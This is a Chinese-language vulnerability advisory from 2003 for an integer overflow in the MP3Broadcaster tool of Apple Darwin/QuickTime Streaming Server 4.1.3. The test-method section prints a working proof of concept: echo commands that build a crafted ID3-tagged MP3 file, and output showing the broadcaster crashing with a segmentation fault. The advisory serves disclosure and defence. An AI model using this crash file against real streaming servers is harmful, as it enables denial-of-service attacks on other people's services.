Apple QuickTime/Darwin流服务器QTSSReflector模块整数溢出漏洞
发布日期:2003-05-22
更新日期:2003-05-29
受影响系统:Apple Darwin Streaming Server 4.1.3
Apple Quicktime Streaming Server 4.1.3
描述:
BUGTRAQ ID:
7659
MP3Broadcaster是Darwin流服务程序包含的MP3广播程序。
MP3Broadcaster不正确处理而已ID3标记,远程攻击者可以利用这个漏洞构建恶意MP3文件,触发由于整数溢出导致的缓冲区溢出,可对服务程序进行拒绝服务攻击。
Darwin Streaming Server (DSS)是流服务器技术可允许使用标准RTP和RTSP协议发送QuickTime数据给客户端,包含的MP3Broadcaster工具在处理ID3标记时没有正确检查边界,恶意的MP3文件可导致MP3Broadcaster发生段错误。
<*来源:Sir Mordred (
sir.mordred@hushmail.com)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105364121904117&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Sir Mordred (
sir.mordred@hushmail.com)提供了如下测试方法:
建立一个示例配置文件:
$ echo -e "\n" > test.conf
然后建立播放列表:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply
建立恶意的MP3文件:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00
" > song.mp3
当用户后检查MP3文件时:
$ MP3Broadcaster -X -l mp3playlist.ply -c test.conf
Configuration Settings
--------------------------
...
play_mode sequential
playlist_file mp3playlist.ply
...
There is one movie in the Playlist.
Segmentation fault (core dumped)
建议:
厂商补丁:
Apple
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://developer.apple.com/darwin/projects/streaming/浏览次数:2733
严重程度:0(网友投票)